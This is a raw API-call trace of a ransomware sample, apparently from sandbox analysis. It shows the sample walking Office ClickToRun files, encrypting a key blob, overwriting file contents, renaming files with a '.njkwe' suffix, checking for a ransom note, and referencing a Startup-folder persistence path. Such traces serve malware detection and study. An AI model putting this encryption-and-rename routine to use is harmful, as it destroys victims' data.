[0072.512] lstrcmpW (lpString1="C2RManifest.wordmui.msi.16.en-us.xml", lpString2="taridd") returned -1 [0072.512] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.wordmui.msi.16.e", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0072.512] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.wordmui.msi.16.en-us.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.wordmui.msi.16.en-us.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x434 [0072.515] GetTickCount () returned 0x11527d7 [0072.515] GetTickCount () returned 0x11527d7 [0072.515] GetTickCount () returned 0x11527d7 [0072.515] GetTickCount () returned 0x11527d7 [0072.515] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f220*, pdwDataLen=0x380f2d0*=0x2c, dwBufLen=0x80 | out: pbData=0x380f220*, pdwDataLen=0x380f2d0*=0x80) returned 1 [0072.515] GetProcessHeap () returned 0xbe0000 [0072.515] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc4d848 [0072.516] ReadFile (in: hFile=0x434, lpBuffer=0xc4d848, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc4d848*, lpNumberOfBytesRead=0x380f2d4*=0x2800, lpOverlapped=0x0) returned 1 [0072.517] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.517] WriteFile (in: hFile=0x434, lpBuffer=0xc4d848*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc4d848*, lpNumberOfBytesWritten=0x380f2d4*=0x2800, lpOverlapped=0x0) returned 1 [0072.517] GetProcessHeap () returned 0xbe0000 [0072.517] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc4d848 | out: hHeap=0xbe0000) returned 1 [0072.518] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0072.518] WriteFile (in: hFile=0x434, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f2d4*=0x300, lpOverlapped=0x0) returned 1 [0072.518] WriteFile (in: hFile=0x434, lpBuffer=0x380f220*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0x380f220*, lpNumberOfBytesWritten=0x380f2d4*=0x80, lpOverlapped=0x0) returned 1 [0072.518] WriteFile (in: hFile=0x434, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f2d4*=0x4, lpOverlapped=0x0) returned 1 [0072.518] CloseHandle (hObject=0x434) returned 1 [0072.518] GetProcessHeap () returned 0xbe0000 [0072.518] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc16310 [0072.518] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.wordmui.msi.16.en-us.xml_r00t_{3sXlE5}.njkwe") returned 135 [0072.518] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.wordmui.msi.16.en-us.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.wordmui.msi.16.en-us.xml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.wordmui.msi.16.en-us.xml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.wordmui.msi.16.en-us.xml_r00t_{3sxle5}.njkwe")) returned 1 [0072.519] GetProcessHeap () returned 0xbe0000 [0072.519] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc16310 | out: hHeap=0xbe0000) returned 1 [0072.519] FindNextFileW (in: hFindFile=0xc1a1a0, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x49bee514, ftCreationTime.dwHighDateTime=0x1d32745, ftLastAccessTime.dwLowDateTime=0x49bee514, ftLastAccessTime.dwHighDateTime=0x1d32745, ftLastWriteTime.dwLowDateTime=0xd2dfa2a2, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x12c470, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="integrator.exe", cAlternateFileName="INTEGR~1.EXE")) returned 1 [0072.519] lstrcmpiW (lpString1="integrator.exe", lpString2="Windows") returned -1 [0072.519] lstrcmpiW (lpString1="integrator.exe", lpString2="$Recycle.bin") returned 1 [0072.519] lstrcmpiW (lpString1="integrator.exe", lpString2="System Volume Information") returned -1 [0072.519] lstrcmpiW (lpString1="integrator.exe", lpString2="Program Files") returned -1 [0072.519] lstrcmpiW (lpString1="integrator.exe", lpString2="Program Files (x86)") returned -1 [0072.519] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\integrator.exe") returned 93 [0072.519] StrStrIW (lpFirst="integrator.exe", lpSrch=".njkwe") returned 0x0 [0072.519] lstrcmpW (lpString1="integrator.exe", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0072.519] lstrcmpW (lpString1="integrator.exe", lpString2="taridd") returned -1 [0072.519] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\integrator.exe", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0072.519] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\integrator.exe" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\integrator.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x434 [0072.519] GetTickCount () returned 0x11527d7 [0072.519] GetTickCount () returned 0x11527d7 [0072.519] GetTickCount () returned 0x11527d7 [0072.519] GetTickCount () returned 0x11527d7 [0072.519] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f220*, pdwDataLen=0x380f2d0*=0x2c, dwBufLen=0x80 | out: pbData=0x380f220*, pdwDataLen=0x380f2d0*=0x80) returned 1 [0072.519] GetProcessHeap () returned 0xbe0000 [0072.519] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc4d848 [0072.520] ReadFile (in: hFile=0x434, lpBuffer=0xc4d848, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc4d848*, lpNumberOfBytesRead=0x380f2d4*=0x2800, lpOverlapped=0x0) returned 1 [0072.521] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.521] WriteFile (in: hFile=0x434, lpBuffer=0xc4d848*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc4d848*, lpNumberOfBytesWritten=0x380f2d4*=0x2800, lpOverlapped=0x0) returned 1 [0072.521] GetProcessHeap () returned 0xbe0000 [0072.521] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc4d848 | out: hHeap=0xbe0000) returned 1 [0072.521] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0072.521] WriteFile (in: hFile=0x434, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f2d4*=0x300, lpOverlapped=0x0) returned 1 [0072.524] WriteFile (in: hFile=0x434, lpBuffer=0x380f220*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0x380f220*, lpNumberOfBytesWritten=0x380f2d4*=0x80, lpOverlapped=0x0) returned 1 [0072.524] WriteFile (in: hFile=0x434, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f2d4*=0x4, lpOverlapped=0x0) returned 1 [0072.525] CloseHandle (hObject=0x434) returned 1 [0072.525] GetProcessHeap () returned 0xbe0000 [0072.525] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc16310 [0072.525] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\integrator.exe_r00t_{3sXlE5}.njkwe") returned 113 [0072.525] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\integrator.exe" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\integrator.exe"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\integrator.exe_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\integrator.exe_r00t_{3sxle5}.njkwe")) returned 1 [0072.525] GetProcessHeap () returned 0xbe0000 [0072.525] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc16310 | out: hHeap=0xbe0000) returned 1 [0072.525] FindNextFileW (in: hFindFile=0xc1a1a0, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3f3481a2, ftCreationTime.dwHighDateTime=0x1d327e9, ftLastAccessTime.dwLowDateTime=0x3f3481a2, ftLastAccessTime.dwHighDateTime=0x1d327e9, ftLastWriteTime.dwLowDateTime=0xf427d4ce, ftLastWriteTime.dwHighDateTime=0x1d47c33, nFileSizeHigh=0x0, nFileSizeLow=0xce8, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="Microsoft_Office_OfficeTelemetryAgentFallBack2016.xml", cAlternateFileName="MICROS~2.XML")) returned 1 [0072.525] lstrcmpiW (lpString1="Microsoft_Office_OfficeTelemetryAgentFallBack2016.xml", lpString2="Windows") returned -1 [0072.525] lstrcmpiW (lpString1="Microsoft_Office_OfficeTelemetryAgentFallBack2016.xml", lpString2="$Recycle.bin") returned 1 [0072.525] lstrcmpiW (lpString1="Microsoft_Office_OfficeTelemetryAgentFallBack2016.xml", lpString2="System Volume Information") returned -1 [0072.525] lstrcmpiW (lpString1="Microsoft_Office_OfficeTelemetryAgentFallBack2016.xml", lpString2="Program Files") returned -1 [0072.525] lstrcmpiW (lpString1="Microsoft_Office_OfficeTelemetryAgentFallBack2016.xml", lpString2="Program Files (x86)") returned -1 [0072.525] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\Microsoft_Office_OfficeTelemetryAgentFallBack2016.xml") returned 132 [0072.525] StrStrIW (lpFirst="Microsoft_Office_OfficeTelemetryAgentFallBack2016.xml", lpSrch=".njkwe") returned 0x0 [0072.525] lstrcmpW (lpString1="Microsoft_Office_OfficeTelemetryAgentFallBack2016.xml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0072.525] lstrcmpW (lpString1="Microsoft_Office_OfficeTelemetryAgentFallBack2016.xml", lpString2="taridd") returned -1 [0072.525] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\Microsoft_Office_OfficeTelem", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0072.526] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\Microsoft_Office_OfficeTelemetryAgentFallBack2016.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\microsoft_office_officetelemetryagentfallback2016.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x434 [0072.526] GetTickCount () returned 0x11527d7 [0072.526] GetTickCount () returned 0x11527d7 [0072.526] GetTickCount () returned 0x11527e7 [0072.527] GetTickCount () returned 0x11527e7 [0072.527] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f220*, pdwDataLen=0x380f2d0*=0x2c, dwBufLen=0x80 | out: pbData=0x380f220*, pdwDataLen=0x380f2d0*=0x80) returned 1 [0072.527] GetProcessHeap () returned 0xbe0000 [0072.527] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc4d848 [0072.527] ReadFile (in: hFile=0x434, lpBuffer=0xc4d848, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc4d848*, lpNumberOfBytesRead=0x380f2d4*=0xce8, lpOverlapped=0x0) returned 1 [0072.528] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0xfffff318, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.528] WriteFile (in: hFile=0x434, lpBuffer=0xc4d848*, nNumberOfBytesToWrite=0xce8, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc4d848*, lpNumberOfBytesWritten=0x380f2d4*=0xce8, lpOverlapped=0x0) returned 1 [0072.528] GetProcessHeap () returned 0xbe0000 [0072.528] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc4d848 | out: hHeap=0xbe0000) returned 1 [0072.529] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0072.529] WriteFile (in: hFile=0x434, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f2d4*=0x300, lpOverlapped=0x0) returned 1 [0072.529] WriteFile (in: hFile=0x434, lpBuffer=0x380f220*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0x380f220*, lpNumberOfBytesWritten=0x380f2d4*=0x80, lpOverlapped=0x0) returned 1 [0072.529] WriteFile (in: hFile=0x434, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f2d4*=0x4, lpOverlapped=0x0) returned 1 [0072.529] CloseHandle (hObject=0x434) returned 1 [0072.529] GetProcessHeap () returned 0xbe0000 [0072.529] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc16310 [0072.529] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\Microsoft_Office_OfficeTelemetryAgentFallBack2016.xml_r00t_{3sXlE5}.njkwe") returned 152 [0072.529] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\Microsoft_Office_OfficeTelemetryAgentFallBack2016.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\microsoft_office_officetelemetryagentfallback2016.xml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\Microsoft_Office_OfficeTelemetryAgentFallBack2016.xml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\microsoft_office_officetelemetryagentfallback2016.xml_r00t_{3sxle5}.njkwe")) returned 1 [0072.530] GetProcessHeap () returned 0xbe0000 [0072.530] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc16310 | out: hHeap=0xbe0000) returned 1 [0072.530] FindNextFileW (in: hFindFile=0xc1a1a0, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3f0e5bdc, ftCreationTime.dwHighDateTime=0x1d327e9, ftLastAccessTime.dwLowDateTime=0x3f0e5bdc, ftLastAccessTime.dwHighDateTime=0x1d327e9, ftLastWriteTime.dwLowDateTime=0xf40d9aa3, ftLastWriteTime.dwHighDateTime=0x1d47c33, nFileSizeHigh=0x0, nFileSizeLow=0xca6, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="Microsoft_Office_OfficeTelemetryAgentLogOn2016.xml", cAlternateFileName="MICROS~1.XML")) returned 1 [0072.530] lstrcmpiW (lpString1="Microsoft_Office_OfficeTelemetryAgentLogOn2016.xml", lpString2="Windows") returned -1 [0072.530] lstrcmpiW (lpString1="Microsoft_Office_OfficeTelemetryAgentLogOn2016.xml", lpString2="$Recycle.bin") returned 1 [0072.530] lstrcmpiW (lpString1="Microsoft_Office_OfficeTelemetryAgentLogOn2016.xml", lpString2="System Volume Information") returned -1 [0072.530] lstrcmpiW (lpString1="Microsoft_Office_OfficeTelemetryAgentLogOn2016.xml", lpString2="Program Files") returned -1 [0072.530] lstrcmpiW (lpString1="Microsoft_Office_OfficeTelemetryAgentLogOn2016.xml", lpString2="Program Files (x86)") returned -1 [0072.530] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\Microsoft_Office_OfficeTelemetryAgentLogOn2016.xml") returned 129 [0072.530] StrStrIW (lpFirst="Microsoft_Office_OfficeTelemetryAgentLogOn2016.xml", lpSrch=".njkwe") returned 0x0 [0072.530] lstrcmpW (lpString1="Microsoft_Office_OfficeTelemetryAgentLogOn2016.xml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0072.530] lstrcmpW (lpString1="Microsoft_Office_OfficeTelemetryAgentLogOn2016.xml", lpString2="taridd") returned -1 [0072.530] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\Microsoft_Office_OfficeTelem", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0072.530] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\Microsoft_Office_OfficeTelemetryAgentLogOn2016.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\microsoft_office_officetelemetryagentlogon2016.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x434 [0072.531] GetTickCount () returned 0x11527e7 [0072.531] GetTickCount () returned 0x11527e7 [0072.531] GetTickCount () returned 0x11527e7 [0072.531] GetTickCount () returned 0x11527e7 [0072.531] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f220*, pdwDataLen=0x380f2d0*=0x2c, dwBufLen=0x80 | out: pbData=0x380f220*, pdwDataLen=0x380f2d0*=0x80) returned 1 [0072.531] GetProcessHeap () returned 0xbe0000 [0072.531] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc4d848 [0072.531] ReadFile (in: hFile=0x434, lpBuffer=0xc4d848, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc4d848*, lpNumberOfBytesRead=0x380f2d4*=0xca6, lpOverlapped=0x0) returned 1 [0072.533] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0xfffff35a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.533] WriteFile (in: hFile=0x434, lpBuffer=0xc4d848*, nNumberOfBytesToWrite=0xca6, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc4d848*, lpNumberOfBytesWritten=0x380f2d4*=0xca6, lpOverlapped=0x0) returned 1 [0072.533] GetProcessHeap () returned 0xbe0000 [0072.533] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc4d848 | out: hHeap=0xbe0000) returned 1 [0072.533] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0072.533] WriteFile (in: hFile=0x434, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f2d4*=0x300, lpOverlapped=0x0) returned 1 [0072.533] WriteFile (in: hFile=0x434, lpBuffer=0x380f220*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0x380f220*, lpNumberOfBytesWritten=0x380f2d4*=0x80, lpOverlapped=0x0) returned 1 [0072.533] WriteFile (in: hFile=0x434, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f2d4*=0x4, lpOverlapped=0x0) returned 1 [0072.534] CloseHandle (hObject=0x434) returned 1 [0072.534] GetProcessHeap () returned 0xbe0000 [0072.534] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc16310 [0072.534] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\Microsoft_Office_OfficeTelemetryAgentLogOn2016.xml_r00t_{3sXlE5}.njkwe") returned 149 [0072.534] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\Microsoft_Office_OfficeTelemetryAgentLogOn2016.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\microsoft_office_officetelemetryagentlogon2016.xml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\Microsoft_Office_OfficeTelemetryAgentLogOn2016.xml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\microsoft_office_officetelemetryagentlogon2016.xml_r00t_{3sxle5}.njkwe")) returned 1 [0072.534] GetProcessHeap () returned 0xbe0000 [0072.534] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc16310 | out: hHeap=0xbe0000) returned 1 [0072.534] FindNextFileW (in: hFindFile=0xc1a1a0, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x433f4072, ftCreationTime.dwHighDateTime=0x1d327e9, ftLastAccessTime.dwLowDateTime=0x433f4072, ftLastAccessTime.dwHighDateTime=0x1d327e9, ftLastWriteTime.dwLowDateTime=0x1bd7df5e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1b826, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="msoutilstat.etw.man", cAlternateFileName="MSOUTI~1.MAN")) returned 1 [0072.534] lstrcmpiW (lpString1="msoutilstat.etw.man", lpString2="Windows") returned -1 [0072.534] lstrcmpiW (lpString1="msoutilstat.etw.man", lpString2="$Recycle.bin") returned 1 [0072.534] lstrcmpiW (lpString1="msoutilstat.etw.man", lpString2="System Volume Information") returned -1 [0072.535] lstrcmpiW (lpString1="msoutilstat.etw.man", lpString2="Program Files") returned -1 [0072.535] lstrcmpiW (lpString1="msoutilstat.etw.man", lpString2="Program Files (x86)") returned -1 [0072.535] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\msoutilstat.etw.man") returned 98 [0072.535] StrStrIW (lpFirst="msoutilstat.etw.man", lpSrch=".njkwe") returned 0x0 [0072.535] lstrcmpW (lpString1="msoutilstat.etw.man", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0072.535] lstrcmpW (lpString1="msoutilstat.etw.man", lpString2="taridd") returned -1 [0072.535] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\msoutilstat.etw.man", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0072.535] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\msoutilstat.etw.man" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\msoutilstat.etw.man"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x434 [0072.535] GetTickCount () returned 0x11527e7 [0072.535] GetTickCount () returned 0x11527e7 [0072.535] GetTickCount () returned 0x11527e7 [0072.535] GetTickCount () returned 0x11527e7 [0072.535] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f220*, pdwDataLen=0x380f2d0*=0x2c, dwBufLen=0x80 | out: pbData=0x380f220*, pdwDataLen=0x380f2d0*=0x80) returned 1 [0072.535] GetProcessHeap () returned 0xbe0000 [0072.535] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc4d848 [0072.535] ReadFile (in: hFile=0x434, lpBuffer=0xc4d848, nNumberOfBytesToRead=0x2800, 